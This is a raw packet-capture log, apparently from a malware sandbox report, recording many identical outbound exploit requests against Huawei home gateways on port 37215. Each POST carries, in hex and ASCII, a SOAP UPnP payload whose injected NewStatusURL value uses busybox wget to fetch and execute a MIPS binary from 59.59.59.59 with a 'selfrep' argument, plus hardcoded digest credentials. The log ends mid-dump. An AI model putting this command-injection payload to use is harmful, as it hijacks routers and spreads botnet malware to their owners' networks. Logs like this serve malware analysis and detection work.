                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1523192.168.2.155331841.235.139.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899274111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1524192.168.2.153644841.155.50.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899333954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1525192.168.2.154704841.124.91.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899353981 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1526192.168.2.1556206157.64.77.337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899606943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1527192.168.2.1542034197.80.102.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899653912 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1528192.168.2.1550732199.223.38.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899729013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1529192.168.2.1536230217.248.223.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899826050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1530192.168.2.1545656197.245.165.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899852037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1531192.168.2.1543802157.88.38.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899873018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1532192.168.2.153762837.5.208.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.899889946 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 